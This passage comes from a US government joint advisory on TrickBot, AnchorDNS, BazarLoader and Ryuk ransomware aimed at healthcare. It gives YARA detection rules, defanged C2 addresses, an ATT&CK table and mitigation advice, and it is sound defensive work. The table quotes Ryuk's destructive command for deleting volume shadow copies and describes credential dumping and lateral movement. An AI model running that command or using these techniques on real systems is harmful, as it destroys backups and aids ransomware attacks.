&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; pe.sections[i].name == “.addr”<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; )<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; or<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $strCtrl<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; or<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 6 of ($ip*)<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; )<br />
}</div>

<div class=”special_container”>rule anchor_dns_check_random_string_in_dns_response {<br />
&nbsp;&nbsp;&nbsp; meta:<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; description = “Rule to detect AnchorDNS samples based off checking random string in DNS response”<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; author = “NCSC”<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; hash1 = “056f326d9ab960ed02356b34a6dcd72d7180fc83″<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; hash2 = “14e9d68bba7a184863667c680a8d5a757149aa36″<br />
&nbsp;&nbsp;&nbsp; strings:<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $x86 = {8A D8 83 C4 10 84 DB 75 08 8B 7D BC E9 84 00 00 00 8B 7D BC 32 DB 8B C7 33 F6 0F 1F 00 85 C0 74 71 40 6A 2F 50 E8 ?? ?? ?? ?? 46 83 C4 08 83 FE 03 72 EA 85 C0 74 5B 83 7D D4 10 8D 4D C0 8B 75 D0 8D 50 01 0F 43 4D C0 83 EE 04 72 11 8B 02 3B 01 75 10 83 C2 04 83 C1 04 83 EE 04 73 EF 83 FE FC 74 2D 8A 02 3A 01 75 29 83 FE FD 74 22 8A 42 01 3A 41 01 75 1C 83 FE FE 74 15 8A 42 02 3A 41 02 75 0F 83 FE FF 74 08 8A 42 03 3A 41 03 75 02 B3 01 8B 75 B8}<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $x64 = {4C 39 75 EF 74 56 48 8D 45 DF 48 83 7D F7 10 48 0F 43 45 DF 49 8B FE 48 85 C0 74 40 48 8D 48 01 BA 2F 00 00 00 E8 ?? ?? ?? ?? 49 03 FF 48 83 FF 03 72 E4 48 85 C0 74 24 48 8D 55 1F 48 83 7D 37 10 48 0F 43 55 1F 48 8D 48 01 4C 8B 45 2F E8 ?? ?? ?? ?? 0F B6 DB 85 C0 41 0F 44 DF 49 03 F7 48 8B 55 F7 48 83 FE 05 0F 82 6A FF FF FF}<br />
&nbsp;&nbsp;&nbsp; condition:<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and any of them<br />
}</div>

<div class=”special_container”>rule anchor_dns_default_result_execute_command {<br />
&nbsp;&nbsp;&nbsp; meta:<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; description = “Rule to detect AnchorDNS samples based off default result value and executing command”<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; author = “NCSC”<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; hash1 = “056f326d9ab960ed02356b34a6dcd72d7180fc83″<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; hash2 = “14e9d68bba7a184863667c680a8d5a757149aa36″<br />
&nbsp;&nbsp;&nbsp; strings:<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $x86 = {83 C4 04 3D 80 00 00 00 73 15 8B 04 85 ?? ?? ?? ?? 85 C0 74 0A 8D 4D D8 51 8B CF FF D0 8A D8 84 DB C7 45 A4 0F 00 00 00}<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $x64 = {48 98 B9 E7 03 00 00 48 3D 80 00 00 00 73 1B 48 8D 15 ?? ?? ?? ?? 48 8B 04 C2 48 85 C0 74 0B 48 8D 55 90 48 8B CE FF D0 8B C8}<br />
&nbsp;&nbsp;&nbsp; condition:<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and any of them<br />
}</div>

<div class=”special_container”>rule anchor_dns_pdbs {<br />
&nbsp;&nbsp;&nbsp; meta:<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; description = “Rule to detect AnchorDNS samples based off partial PDB paths”<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; author = “NCSC”<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; hash1 = “f0e575475f33600aede6a1b9a5c14f671cb93b7b”<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; hash2 = “1304372bd4cdd877778621aea715f45face93d68″<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; hash3 = “e5dc7c8bfa285b61dda1618f0ade9c256be75d1a”<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; hash4 = “f96613ac6687f5dbbed13c727fa5d427e94d6128″<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; hash5 = “46750d34a3a11dd16727dc622d127717beda4fa2″<br />
&nbsp;&nbsp;&nbsp; strings:<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = “:\MyProjects\secondWork\Anchor\”&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = “:\simsim\anchorDNS”<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = “:\[JOB]\Anchor\”<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = “:\Anchor\Win32\Release\Anchor_”<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = “:\Users\ProFi\Desktop\data\Win32\anchor”<br />
&nbsp;&nbsp;&nbsp; condition:<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and any of them<br />
}</div>

<h4>BazarLoader/BazarBackdoor</h4>

<p>Beginning in approximately early 2020, actors believed to be associated with TrickBot began using BazarLoader and BazarBackdoor to infect victim networks. The loader and backdoor work closely together to achieve infection and communicate with the same C2 infrastructure. Campaigns using Bazar represent a new technique for cybercriminals to infect and monetize networks and have increasingly led to the deployment of ransomware, including Ryuk. BazarLoader has become one of the most commonly used vectors for ransomware deployment.</p>

<p>Deployment of the BazarLoader malware typically comes from phishing email and contains the following:</p>

<ul>
<li>Phishing emails are typically delivered by commercial mass email delivery services. Email received by a victim will contain a link to an actor-controlled Google Drive document or other free online filehosting solutions, typically purporting to be a PDF file.</li>
<li>This document usually references a failure to create a preview of the document and contains a link to a URL hosting a malware payload in the form of a misnamed or multiple extension file.</li>
<li>Emails can appear as routine, legitimate business correspondence about customer complaints, hiring decision, or other important tasks that require the attention of the recipient. &nbsp;</li>
<li>Some email communications have included the recipient’s name or employer name in the subject line and/or email body.</li>
</ul>

<p>Through phishing emails linking users to Google Documents, actors used the below identified file names to install BazarLoader:</p>

<ul>
<li><code>Report-Review26-10.exe</code></li>
<li><code>Review_Report15-10.exe</code></li>
<li><code>Document_Print.exe</code></li>
<li><code>Report10-13.exe</code></li>
<li><code>Text_Report.exe</code></li>
</ul>

<p>Bazar activity can be identified by searching the system startup folders and Userinit values under the <code>HKLMSOFTWAREMicrosoftWindows NTCurrentVersionWinlogon</code> registry key:</p>

<p><code>%APPDATA%MicrosoftWindowsStart MenuProgramsStartupadobe.lnk</code></p>

<p>For a comprehensive list of indicators of compromise regarding the BazarLocker and other malware, see <a href=”https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html”>https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html</a>.</p>

<h4>Indicators</h4>

<p>In addition to TrickBot and BazarLoader, threat actors are using malware, such as KEGTAP, BEERBOT, SINGLEMALT, and others as they continue to change tactics, techniques, and procedures in their highly dynamic campaign. The following C2 servers are known to be associated with this malicious activity.</p>

<ul>
<li><code>45[.]148[.]10[.]92</code></li>
<li><code>170[.]238[.]117[.]187</code></li>
<li><code>177[.]74[.]232[.]124</code></li>
<li><code>185[.]68[.]93[.]17</code></li>
<li><code>203[.]176[.]135[.]102</code></li>
<li><code>96[.]9[.]73[.]73</code></li>
<li><code>96[.]9[.]77[.]142</code></li>
<li><code>37[.]187[.]3[.]176</code></li>
<li><code>45[.]89[.]127[.]92</code></li>
<li><code>62[.]108[.]35[.]103</code></li>
<li><code>91[.]200[.]103[.]242</code></li>
<li><code>103[.]84[.]238[.]3</code></li>
<li><code>36[.]89[.]106[.]69</code></li>
<li><code>103[.]76[.]169[.]213</code></li>
<li><code>36[.]91[.]87[.]227</code></li>
<li><code>105[.]163[.]17[.]83</code></li>
<li><code>185[.]117[.]73[.]163</code></li>
<li><code>5[.]2[.]78[.]118</code></li>
<li><code>185[.]90[.]61[.]69</code></li>
<li><code>185[.]90[.]61[.]62</code></li>
<li><code>86[.]104[.]194[.]30</code></li>
<li><code>31[.]131[.]21[.]184</code></li>
<li><code>46[.]28[.]64[.]8</code></li>
<li><code>104[.]161[.]32[.]111</code></li>
<li><code>107[.]172[.]140[.]171</code></li>
<li><code>131[.]153[.]22[.]148</code></li>
<li><code>195[.]123[.]240[.]219</code></li>
<li><code>195[.]123[.]242[.]119</code></li>
<li><code>195[.]123[.]242[.]120</code></li>
<li><code>51[.]81[.]113[.]25</code></li>
<li><code>74[.]222[.]14[.]27</code></li>
</ul>

<h4>Ryuk Ransomware</h4>

<p>Typically Ryuk has been deployed as a payload from banking Trojans such as TrickBot. (See the <a href=”https://www.ncsc.gov.uk/news/ryuk-advisory”>United Kingdom (UK) National Cyber Security Centre (NCSC) advisory, Ryuk Ransomware Targeting Organisations Globally</a>, on their ongoing investigation into global Ryuk ransomware campaigns and associated Emotet and TrickBot malware.) Ryuk first appeared in August 2018 as a derivative of Hermes 2.1 ransomware, which first emerged in late 2017 and was available for sale on the open market as of August 2018. Ryuk still retains some aspects of the Hermes code. For example, all of the files encrypted by Ryuk contain the <code>HERMES </code>tag but, in some infections, the files have <code>.ryk</code> added to the filename, while others do not. In other parts of the ransomware code, Ryuk has removed or replaced features of Hermes, such as the restriction against targeting specific Eurasia-based systems.</p>

<p>While negotiating the victim network, Ryuk actors will commonly use commercial off-the-shelf products—such as Cobalt Strike and PowerShell Empire—in order to steal credentials. Both frameworks are very robust and are highly effective dual-purpose tools, allowing actors to dump clear text passwords or hash values from memory with the use of Mimikatz. This allows the actors to inject malicious dynamic-link library into memory with read, write, and execute permissions. In order to maintain persistence in the victim environment, Ryuk actors have been known to use scheduled tasks and service creation.</p>

<p>Ryuk actors will quickly map the network in order to enumerate the environment to understand the scope of the infection. In order to limit suspicious activity and possible detection, the actors choose to live off the land and, if possible, use native tools—such as net view, net computers, and ping—to locate mapped network shares, domain controllers, and active directory. In order to move laterally throughout the network, the group relies on native tools, such as PowerShell, Windows Management Instrumentation (WMI), Windows Remote Management , and Remote Desktop Protocol (RDP). The group also uses third-party tools, such as Bloodhound.</p>

<p>Once dropped, Ryuk uses AES-256 to encrypt files and an RSA public key to encrypt the AES key. The Ryuk dropper drops a <code>.bat</code> file that attempts to delete all backup files and Volume Shadow Copies (automatic backup snapshots made by Windows), preventing the victim from recovering encrypted files without the decryption program.</p>

<p>In addition, the attackers will attempt to shut down or uninstall security applications on the victim systems that might prevent the ransomware from executing. Normally this is done via a script, but if that fails, the attackers are capable of manually removing the applications that could stop the attack. The <code>RyukReadMe</code> file placed on the system after encryption provides either one or two email&nbsp; addresses, using the end-to-end encrypted email provider Protonmail, through which the victim can contact the attacker(s). While earlier versions provide a ransom amount in the initial notifications, Ryuk users are now designating a ransom amount only after the victim makes contact.</p>

<p>The victim is told how much to pay to a specified Bitcoin wallet for the decryptor and is provided a sample decryption of two files.</p>

<p>Initial testing indicates that the <code>RyukReadMe</code> file does not need to be present for the decryption script to run successfully but other reporting advises some files will not decrypt properly without it. Even if run correctly, there is no guarantee the decryptor will be effective. This is further complicated because the <code>RyukReadMe</code> file is deleted when the script is finished. This may affect the decryption script unless it is saved and stored in a different location before running.</p>

<p>According to MITRE, <a href=”https://attack.mitre.org/versions/v7/software/S0446/”>Ryuk </a>uses the ATT&amp;CK techniques listed in table 1.</p>

<p class=”text-align-center”><em>Table 1: Ryuk ATT&amp;CK techniques</em></p>

<table border=”1″ cellpadding=”1″ cellspacing=”1″ class=”general-table” style=”width: 881.46px; height: 312px; margin-right: auto; margin-left: auto;”>
<thead>
<tr>
<th scope=”col” style=”width: 198px;”><strong>Technique</strong></th>
<th scope=”col” style=”width: 356px;”><strong>Use</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td scope=”col” style=”width: 198px; text-align: left;”>System Network Configuration Discovery [<a href=”https://attack.mitre.org/versions/v7/techniques/T1016/”>T1016</a>]</td>
<td scope=”col” style=”width: 356px; text-align: left;”>Ryuk has called <code>GetIpNetTable</code> in attempt to identify all mounted drives and hosts that have Address Resolution Protocol entries.&nbsp;</td>
</tr>
<tr>
<td scope=”col” style=”width: 198px; text-align: left;”>
<p>Masquerading: Match Legitimate Name or Location [<a href=”https://attack.mitre.org/versions/v7/techniques/T1036/005/”>T1036.005</a>]</p>
</td>
<td scope=”col” style=”width: 356px; text-align: left;”>Ryuk has constructed legitimate appearing installation folder paths by calling <code>GetWindowsDirectoryW</code> and then inserting a null byte at the fourth character of the path. For Windows Vista or higher, the path would appear as <code>C:UsersPublic</code>.&nbsp;</td>
</tr>
<tr>
<td scope=”col” style=”width: 198px; text-align: left;”>Process Injection [<a href=”https://attack.mitre.org/versions/v7/techniques/T1055/”>T1055</a>]</td>
<td scope=”col” style=”width: 356px; text-align: left;”>Ryuk has injected itself into remote processes to encrypt files using a combination of <code>VirtualAlloc</code>, <code>WriteProcessMemory</code>, and <code>CreateRemoteThread</code>.&nbsp;</td>
</tr>
<tr>
<td scope=”col” style=”width: 198px; text-align: left;”>Process Discovery [<a href=”https://attack.mitre.org/versions/v7/techniques/T1057/”>T1057</a>]</td>
<td scope=”col” style=”width: 356px; text-align: left;”>Ryuk has called <code>CreateToolhelp32Snapshot</code> to enumerate all running processes.&nbsp;</td>
</tr>
<tr>
<td scope=”col” style=”width: 198px; text-align: left;”>Command and Scripting Interpreter: Windows Command Shell [<a href=”https://attack.mitre.org/versions/v7/techniques/T1059/003/”>T1059.003</a>]</td>
<td scope=”col” style=”width: 356px; text-align: left;”>Ryuk has used <code>cmd.exe</code> to create a Registry entry to establish persistence.&nbsp;</td>
</tr>
<tr>
<td scope=”col” style=”width: 198px; text-align: left;”>File and Directory Discovery [<a href=”https://attack.mitre.org/versions/v7/techniques/T1083/”>T1083</a>]</td>
<td scope=”col” style=”width: 356px; text-align: left;”>Ryuk has called <code>GetLogicalDrives</code> to enumerate all mounted drives, and <code>GetDriveTypeW</code> to determine the drive type.</td>
</tr>
<tr>
<td scope=”col” style=”width: 198px; text-align: left;”>Native API [<a href=”https://attack.mitre.org/versions/v7/techniques/T1106/”>T1106</a>]</td>
<td scope=”col” style=”width: 356px; text-align: left;”>Ryuk has used multiple native APIs including <code>ShellExecuteW</code> to run executables;&nbsp;<code>GetWindowsDirectoryW</code> to create folders; and <code>VirtualAlloc</code>, <code>WriteProcessMemory</code>, and <code>CreateRemoteThread</code> for process injection.&nbsp;</td>
</tr>
<tr>
<td scope=”col” style=”width: 198px; text-align: left;”>Access Token Manipulation [<a href=”https://attack.mitre.org/versions/v7/techniques/T1134/”>T1134</a>]</td>
<td scope=”col” style=”width: 356px; text-align: left;”>Ryuk has attempted to adjust its token privileges to have the <code>SeDebugPrivilege</code>.&nbsp;</td>
</tr>
<tr>
<td scope=”col” style=”width: 198px; text-align: left;”>Data Encrypted for Impact [<a href=”https://attack.mitre.org/versions/v7/techniques/T1486/”>T1486</a>]</td>
<td scope=”col” style=”width: 356px; text-align: left;”>Ryuk has used a combination of symmetric and asymmetric encryption to encrypt files. Files have been encrypted with their own AES key and given a file extension of <code>.RYK</code>. Encrypted directories have had a ransom note of <code>RyukReadMe.txt</code> written to the directory.&nbsp;</td>
</tr>
<tr>
<td scope=”col” style=”width: 198px; text-align: left;”>Service Stop [<a href=”https://attack.mitre.org/versions/v7/techniques/T1489/”>T1489</a>]</td>
<td scope=”col” style=”width: 356px; text-align: left;”>Ryuk has called <code>kill.bat</code> for stopping services, disabling services and killing processes.&nbsp;</td>
</tr>
<tr>
<td scope=”col” style=”width: 198px; text-align: left;”>Inhibit System Recovery [<a href=”https://attack.mitre.org/versions/v7/techniques/T1490/”>T1490</a>]</td>
<td scope=”col” style=”width: 356px; text-align: left;”>Ryuk has used <code>vssadmin Delete Shadows /all /quiet</code> to delete volume shadow copies and <code>vssadmin resize shadowstorage</code> to force deletion of shadow copies created by third-party applications.&nbsp;</td>
</tr>
<tr>
<td scope=”col” style=”width: 198px; text-align: left;”>Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder [<a href=”https://attack.mitre.org/versions/v7/techniques/T1547/001/”>T1047.001</a>]</td>
<td scope=”col” style=”width: 356px; text-align: left;”>Ryuk has used the Windows command line to create a Registry entry under <code>HKEY_CURRENT_USERSOFTWAREMicrosoftWindowsCurrentVersionRun</code> to establish persistence.</td>
</tr>
<tr>
<td scope=”col” style=”width: 198px; text-align: left;”>Impair Defenses: Disable or Modify Tools [<a href=”https://attack.mitre.org/versions/v7/techniques/T1562/001/”>T1562.001</a>]</td>
<td scope=”col” style=”width: 356px; text-align: left;”>Ryuk has stopped services related to anti-virus.</td>
</tr>
</tbody>
</table>
<h3>Mitigations</h3><p>For a downloadable copy of IOCs, see <a href=”https://us-cert.cisa.gov/sites/default/files/publications/AA20-302A.stix.xml”>AA20-302A.stix</a>. For additional IOCs detailing this activity, see <a href=”https://gist.github.com/aaronst/6aa7f61246f53a8dd4befea86e832456″>https://gist.github.com/aaronst/6aa7f61246f53a8dd4befea86e832456</a>.</p>

<h4>Plans and Policies</h4>

<p>CISA, FBI, and HHS encourage HPH Sector organizations to maintain business continuity plans—the practice of executing essential functions through emergencies (e.g., cyberattacks)—to minimize service interruptions. Without planning, provision, and implementation of continuity principles, organizations may be unable to continue operations. Evaluating continuity and capability will help identify continuity gaps. Through identifying and addressing these gaps, organizations can establish a viable continuity program that will help keep them functioning during cyberattacks or other emergencies. CISA, FBI, and HHS suggest HPH Sector organizations review or establish patching plans, security policies, user agreements, and business continuity plans to ensure they address current threats posed by malicious cyber actors.</p>

<h4>Network Best Practices</h4>

<ul>
<li>Patch operating systems, software, and firmware as soon as manufacturers release updates.</li>
<li>Check configurations for every operating system version for HPH organization-owned assets to prevent issues from arising that local users are unable to fix due to having local administration disabled.</li>
<li>Regularly change passwords to network systems and accounts and avoid reusing passwords for different accounts.</li>
<li>Use multi-factor authentication where possible.</li>
<li>Disable unused remote access/Remote Desktop Protocol (RDP) ports and monitor remote access/RDP logs.</li>
<li>Implement application and remote access allow listing to only allow systems to execute programs known and permitted by the established security policy.</li>
<li>Audit user accounts with administrative privileges and configure access controls with least privilege in mind.</li>
<li>Audit logs to ensure new accounts are legitimate.</li>
<li>Scan for open or listening ports and mediate those that are not needed.</li>
<li>Identify critical assets such as patient database servers, medical records, and teleheatlh and telework infrastructure; create backups of these systems and house the backups offline from the network.</li>
<li>Implement network segmentation. Sensitive data should not reside on the same server and network segment as the email environment.</li>
<li>Set antivirus and anti-malware solutions to automatically update; conduct regular scans.</li>
</ul>

<h4>Ransomware Best Practices</h4>

<p>CISA, FBI and HHS do not recommend paying ransoms. Payment does not guarantee files will be recovered. It may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. In addition to implementing the above network best practices, the FBI, CISA and HHS also recommend the following:</p>

<ul>
<li>Regularly back up data, air gap, and password protect backup copies offline.</li>
<li>Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, secure location.</li>
</ul>

<h4>User Awareness Best Practices</h4>

<ul>
<li>Focus on awareness and training. Because end users are targeted, make employees and stakeholders aware of the threats—such as ransomware and phishing scams—and how they are delivered. Additionally, provide users training on information security principles and techniques as well as overall emerging cybersecurity risks and vulnerabilities.</li>
<li>Ensure that employees know who to contact when they see suspicious activity or when they believe they have been a victim of a cyberattack. This will ensure that the proper established mitigation strategy can be employed quickly and efficiently.</li>
</ul>

<h4>Recommended Mitigation Measures</h4>

<p>System administrators who have indicators of a TrickBot network compromise should immediately take steps to back up and secure sensitive or proprietary data. TrickBot infections may be indicators of an imminent ransomware attack; system administrators should take steps to secure network devices accordingly. Upon evidence of a TrickBot infection, review DNS logs and use the <code>XOR</code> key of <code>0xB9</code> to decode <code>XOR</code> encoded DNS requests to reveal the presence of <code>Anchor_DNS</code>, and maintain and provide relevant logs.</p>

<h3>GENERAL RANSOMWARE MITIGATIONS — HPH SECTOR</h3>

<p>This section is based on CISA and Multi-State Information Sharing and Analysis Center (MS-ISAC)’s Joint Ransomware Guide, which can be found at <a href=”https://www.cisa.gov/publication/ransomware-guide”>https://www.cisa.gov/publication/ransomware-guide</a>.</p>

<p>CISA, FBI, and HHS recommend that healthcare organizations implement both ransomware prevention and ransomware response measures immediately.</p>

<h4>Ransomware Prevention</h4>

<h4><em>Join and Engage with Cybersecurity Organizations</em></h4>

<p>CISA, FBI, and HHS recommend that healthcare organizations take the following initial steps:</p>

<ul>
<li>Join a healthcare information sharing organization, H-ISAC:
<ul>
<li>Health Information Sharing and Analysis Center (H-ISAC): <a href=”https://h-isac.org/membership-account/join-h-isac/”>https://h-isac.org/membership-account/join-h-isac/</a></li>
<li>Sector-based ISACs – National Council of ISACs: <a href=”https://www.nationalisacs.org/member-isacs”>https://www.nationalisacs.org/member-isacs</a></li>
<li>Information Sharing and Analysis Organization (ISAO) Standards Organization: <a href=”https://www.isao.org/information-sharing-groups/”>https://www.isao.org/information-sharing-groups/</a></li>
</ul>
</li>
<li>Engage with CISA and FBI, as well as HHS—through the HHS Health Sector Cybersecurity Coordination Center (HC3)—to build a lasting partnership and collaborate on information sharing, best practices, assessments, and exercises.
<ul>
<li>CISA: <a href=”https://us-cert.cisa.govcisa.gov”>cisa.gov</a>, <a href=”https://us-cert.cisa.gov/mailing-lists-and-feeds”>https://us-cert.cisa.gov/mailing-lists-and-feeds</a>, <a href=”https://us-cert.cisa.govcentral@cisa.gov”>central@cisa.gov</a> &nbsp;</li>
<li>FBI: <a href=”https://us-cert.cisa.govic3.gov”>ic3.gov</a>, <a href=”https://us-cert.cisa.govwww.fbi.gov/contact-us/field”>www.fbi.gov/contact-us/field</a>, <a href=”https://us-cert.cisa.govwww.fbi.gov/contact-us/field”>CyWatch@fbi.gov</a></li>
<li>HHS/HC3: <a href=”http://www.hhs.gov/hc3″>http://www.hhs.gov/hc3</a>, <a href=”https://us-cert.cisa.govHC3@HHS.gov”>HC3@HHS.gov</a></li>
</ul>
</li>
</ul>

<p>Engaging with the H-ISAC, ISAO, CISA, FBI, and HHS/HC3 will enable your organization to receive critical information and access to services to better manage the risk posed by ransomware and other cyber threats.</p>

<h4><em>Follow Ransomware Best Practices</em></h4>

<p>Refer to the best practices and references below to help manage the risk posed by ransomware and support your organization’s coordinated and efficient response to a ransomware incident. Apply these practices to the greatest extent possible based on availability of organizational resources.</p>

<ul>
<li>It is critical to maintain offline, encrypted backups of data and to regularly test your backups. Backup procedures should be conducted on a regular basis. It is important that backups be maintained offline or in separated networks as many ransomware variants attempt to find and delete any accessible backups. Maintaining offline, current backups is most critical because there is no need to pay a ransom for data that is readily accessible to your organization.
<ul>
<li>Use the 3-2-1 rule as a guideline for backup practices. The rule states that three copies of all critical data are retained on at least two different types of media and at least one of them is stored offline.</li>
<li>Maintain regularly updated “gold images” of critical systems in the event they need to be rebuilt. This entails maintaining image “templates” that include a preconfigured operating system (OS) and associated software applications that can be quickly deployed to rebuild a system, such as a virtual machine or server.</li>
<li>Retain backup hardware to rebuild systems in the event rebuilding the primary system is not preferred.
<ul>
<li>Hardware that is newer or older than the primary system can present installation or compatibility hurdles when rebuilding from images.</li>
<li>Ensure all backup hardware is properly patched.</li>
</ul>
</li>
</ul>
</li>
<li>In addition to system images, applicable source code or executables should be available (stored with backups, escrowed, license agreement to obtain, etc.). It is more efficient to rebuild from system images, but some images will not install on different hardware or platforms correctly; having separate access to needed software will help in these cases.</li>
<li>Create, maintain, and exercise a basic cyber incident response plan and associated communications plan that includes response and notification procedures for a ransomware incident.
<ul>
<li>Review available incident response guidance, such as CISA’s Technical Approaches to Uncovering and Remediating Malicious Activity&nbsp;<a href=”https://us-cert.cisa.gov/ncas/alerts/aa20-245a”>https://us-cert.cisa.gov/ncas/alerts/aa20-245a</a>.</li>
</ul>
</li>
<li>Help your organization better organize around cyber incident response.</li>
<li>Develop a cyber incident response plan.</li>
<li>The Ransomware Response Checklist, available in the <a href=”https://www.cisa.gov/publication/ransomware-guide”>CISA and MS-ISAC Joint Ransomware Guide</a>, serves as an adaptable, ransomware- specific annex to organizational cyber incident response or disruption plans.</li>
<li>Review and implement as applicable MITRE’s Medical Device Cybersecurity: Regional Incident Preparedness and Response Playbook (<a href=”https://www.mitre.org/sites/default/files/publications/pr-18-1550-Medical-Device-Cybersecurity-Playbook.pdf”>https://www.mitre.org/sites/default/files/publications/pr-18-1550-Medical-Device-Cybersecurity-Playbook.pdf</a>).</li>
<li>Develop a risk management plan that maps critical health services and care to the necessary information systems; this will ensure that the incident response plan will contain the proper triage procedures.</li>
<li>Plan for the possibility of critical information systems being inaccessible for an extended period of time. This should include but not be limited to the following:
<ul>
<li>Print and properly store/protect hard copies of digital information that would be required for critical patient healthcare.</li>
<li>Plan for and periodically train staff to handle the re-routing of incoming/existing patients in an expedient manner if information systems were to abruptly and unexpectedly become unavailable.</li>
<li>Coordinate the potential for surge support with other healthcare facilities in the greater local area. This should include organizational leadership periodically meeting and collaborating with counterparts in the greater local area to create/update plans for their facilities to both abruptly send and receive a significant amount of critical patients for immediate care. This may include the opportunity to re-route healthcare employees (and possibly some equipment) to provide care along with additional patients.</li>
</ul>
</li>
<li>Consider the development of a second, air-gapped communications network that can provide a minimum standard of backup support for hospital operations if the primary network becomes unavailable if/when needed.</li>
<li>Predefine network segments, IT capabilities and other functionality that can either be quickly separated from the greater network or shut down entirely without impacting operations of the rest of the IT infrastructure.</li>
<li>Legacy devices should be identified and inventoried with highest priority and given special consideration during a ransomware event.</li>
<li>See <a href=”https://www.cisa.gov/publication/ransomware-guide”>CISA and MS-ISAC’s Joint Ransomware Guide</a> for infection vectors including internet-facing vulnerabilities and misconfigurations; phishing; precursor malware infection; and third parties and managed service providers.</li>
<li>HHS/HC3 tracks ransomware that is targeting the HPH Sector; this information can be found at <a href=”http://www.hhs.gov/hc3″>http://www.hhs.gov/hc3</a>.</li>
</ul>

<h4><em>Hardening Guidance</em></h4>

<ul>
<li>The Food and Drug Administration provides multiple guidance documents regarding the hardening of healthcare and specifically medical devices found here: <a href=”https://www.fda.gov/medical-devices/digital-health-center-excellence/cybersecurity”>https://www.fda.gov/medical-devices/digital-health-center-excellence/cybersecurity</a>.</li>
<li>See <a href=”https://www.cisa.gov/publication/ransomware-guide”>CISA and MS-ISAC’s Joint Ransomware Guide</a> for additional in-depth hardening guidance.</li>
</ul>

<h4><em>Contact CISA for These No-Cost Resources</em></h4>

<ul>
<li>Information sharing with CISA and MS-ISAC (for SLTT organizations) includes bi-directional sharing of best practices and network defense information regarding ransomware trends and variants as well as malware that is a precursor to ransomware.</li>
<li>Policy-oriented or technical assessments help organizations understand how they can improve their defenses to avoid ransomware infection: <a href=”https://www.cisa.gov/cyber-resource-hub”>https://www.cisa.gov/cyber-resource-hub</a>.
<ul>
<li>Assessments include Vulnerability Scanning and Phishing Campaign Assessment.</li>
</ul>
</li>
<li>Cyber exercises evaluate or help develop a cyber incident response plan in the context of a ransomware incident scenario.</li>
<li>CISA Cybersecurity Advisors (CSAs) advise on best practices and connect you with CISA resources to manage cyber risk.</li>
<li>Contacts:
<ul>
<li>SLTT organizations: <a href=”https://us-cert.cisa.govCyberLiaison_SLTT@cisa.dhs.gov”>CyberLiaison_SLTT@cisa.dhs.gov</a></li>
